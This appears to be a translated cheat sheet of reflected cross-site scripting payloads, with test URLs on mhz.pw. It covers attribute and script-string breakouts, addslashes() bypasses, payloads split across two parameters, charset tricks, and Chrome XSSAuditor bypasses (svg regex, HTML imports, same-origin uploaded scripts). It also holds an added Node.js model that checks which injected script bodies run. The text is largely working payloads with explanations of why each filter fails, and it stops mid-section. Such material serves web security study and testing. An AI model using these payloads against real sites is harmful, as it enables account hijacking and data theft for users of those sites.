test:
http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
Output lands inside an attribute, with a script block following it
context:
<img alt="">
<script> y = "abc"; </script>
payload
"><script/src=data:,alert(document.domain)+"
The payload closes the alt attribute and the img tag, then opens a script element whose src is an unquoted data: URL. Because the value is unquoted, the page's own closing `"` becomes part of it, giving `data:,alert(document.domain)+""`, which is still valid JavaScript. The injected script element has no closing tag of its own, so it ends at the `</script>` that already follows in the page.
test
http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22
Two reflection points
context:
<?php
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."
";
// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."
";
?>
payload:
http://xxx/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script>
http://xxx/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>
The script element is split across the two parameters: text1 opens `<script>` and a string literal, text2 closes the literal and the element, so whatever the page prints between the two reflection points is swallowed as string contents and neither parameter on its own contains a complete script. This only works if the fragment between the two points contains no quote or line break; either would break the single-quoted literal.
test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E
Chrome 43 XSSAuditor bypass
Roughly every version before 06-23 is affected.
context: any output context
payload:
xss=<svg><script>/<1/>alert(document.domain)</script></svg>
Inside `<svg><script>` the `<1` is not a tag start (a `<` followed by a digit is plain text), so the script body is `/<1/>alert(document.domain)`: a regular-expression literal `/<1/` compared with the result of `alert(document.domain)`. Evaluating the comparison calls alert, so the payload fires.
test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E
Chrome 36~40: HTML import via link bypasses the Auditor
Fixed on Oct 10 (in practice it still worked at the beginning of the next year).
/p/chromium/issues/detail?id=421166
/bugs/wooyun--090304
Loading external HTML through `<link rel=import>` bypasses the XSSAuditor: the reflected payload is only a link element, and the script lives in the imported document, which is never compared against the request. HTML Imports were removed from Chrome in version 80, so this vector is historical.
context: any output context
payload
xss=<link rel=import href=https://auth.mhz.pw/game/xss/link.php>
test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E
Output lands inside a string in a script block
If the string can be closed, just close it and write JavaScript, e.g.:
http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
But what if the single quote cannot be closed, as in this context?
```html
<html>
<head>
<meta charset="utf-8">
<title>alltitle</title>
<script type="text/javascript">
var a = '<?php echo addslashes($_GET["xss"]); ?>';
</script>
</head>
<body>
123
</body>
</html>
```
payload
</script><svg><script>alert(1)+&apos;
</script><svg><script>alert(1)//
addslashes() only escapes `'`, `"`, `\` and NUL; `<`, `>` and `/` pass through, and the HTML parser knows nothing about JavaScript strings, so `</script>` ends the script element from inside the literal. The template's trailing `';` then lands inside the new `<svg><script>` element. SVG script text is foreign content, where character references are decoded, so `+&apos;` becomes `+'` and pairs with the leftover quote to give `alert(1)+'';`; the `//` variant simply comments the leftover out. Without one of these tails the second script is a syntax error and nothing runs.
test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
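As an added example that is not part of the original page, here is a small Node.js model of three of the contexts above: the two-reflection-point page, the addslashes() string context in this section, and the `/<1/>` body from the Chrome 43 payload. It answers one question for each: does the script body the browser would end up with actually parse and run? The HTML parsing and character-reference handling are a deliberately naive approximation written for these inputs (an assumption, not a browser), the `<br>` between the two echoes is assumed because the page does not preserve what sits there, and the block-comment variant goes beyond the page.

```javascript
// Added example (not from the original page). Models the two-reflection-point
// page and the addslashes() string context, and checks which stitched script
// bodies parse and run. Nothing here models the Auditor itself.

// PHP addslashes(): backslash-escapes ' " \ and NUL only; < > / & pass through.
function addslashes(s) {
  return s.replace(/[\\'"]/g, (c) => "\\" + c).replace(/\0/g, "\\0");
}

// Decoder for the few character references used here (assumption: enough for
// the demonstration; a browser decodes the full set).
function decodeRefs(s) {
  const named = { apos: "'", quot: '"', lt: "<", gt: ">", amp: "&" };
  return s.replace(/&(apos|quot|lt|gt|amp);/gi, (m, n) => named[n.toLowerCase()]);
}

// Script bodies in the order the HTML parser would create them. Text in an HTML
// <script> is raw (script-data state); in <svg><script> it is foreign content
// and character references are decoded. Naive regex, adequate for these inputs.
function scriptBodies(html) {
  const out = [];
  const re = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const before = html.slice(0, m.index);
    const inSvg = before.lastIndexOf("<svg>") > before.lastIndexOf("</svg>");
    out.push(inSvg ? decodeRefs(m[1]) : m[1]);
  }
  return out;
}

// Runs one script body with alert() replaced by a recorder. Returns the
// recorded arguments, or null when the body does not even parse as JavaScript.
function runWithAlertSpy(body) {
  const seen = [];
  try {
    new Function("alert", body)((x) => seen.push(String(x)));
  } catch (e) {
    if (e instanceof SyntaxError) return null;
    throw e;
  }
  return seen;
}

// --- two reflection points (doubleout.php) ---------------------------------
// What the page prints between the two echoes was not preserved; SEP is assumed.
const SEP = "<br>";

function renderDouble(text1, text2, sep = SEP) {
  return "This is text1:" + text1 + sep + "This is text2:" + text2 + sep;
}

// The page's split payload: the string literal opened in text1 is closed in
// text2, so the markup between the reflection points becomes string contents.
// Pass sep="\n" to see the failure mode: a raw line break in a single-quoted
// literal is a syntax error; a /* ... */ block comment tolerates it.
function doubleOut(text1, text2, sep = SEP) {
  return scriptBodies(renderDouble(text1, text2, sep)).map(runWithAlertSpy);
}

// --- value inside a single-quoted JS string (scriptaddslashes.php) ----------
// escape=false models scriptstr.php, where the quote can simply be closed.
function renderString(xss, escape = true) {
  const v = escape ? addslashes(xss) : xss;
  return "<script type=\"text/javascript\">\nvar a = '" + v + "';\n</script>\n<body>123</body>";
}

// One entry per script element in the injected page: the recorded alert()
// arguments, or null for a script that is a syntax error.
function stringOut(xss, escape = true) {
  return scriptBodies(renderString(xss, escape)).map(runWithAlertSpy);
}
```

`doubleOut("<script>alert(/XSS/);void('", "')</script>")` records one alert, while the same call with `"\n"` as separator parses nothing; `stringOut("</script><svg><script>alert(1)")` yields two syntax errors, and only the `+&apos;` and `//` tails turn the second element into a running script, which a plain `<script>` (no `<svg>`) does not, because `&apos;` stays raw there. `runWithAlertSpy("/<1/>alert(1)")` shows the Chrome 43 body evaluating its comparison and calling alert.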
Generic bypass when there is a controllable upload point
context:
There is an upload point under your control on the site's own domain. Upload a .txt, .js or similar file (anything that is not a media file will do; if the upload check is a blacklist, any made-up extension works), then reference it from the src attribute of a script tag. The Auditor does not treat a script whose src is on the page's own origin as injected, so the reflected tag passes, and the file's extension and Content-Type do not matter unless the response carries `X-Content-Type-Options: nosniff`, which makes Chrome refuse to execute a script served with a non-JavaScript MIME type. Serving user uploads from a separate origin closes this route.
payload
xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
test
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E
JSON Encode
context
$_GET['x'])?>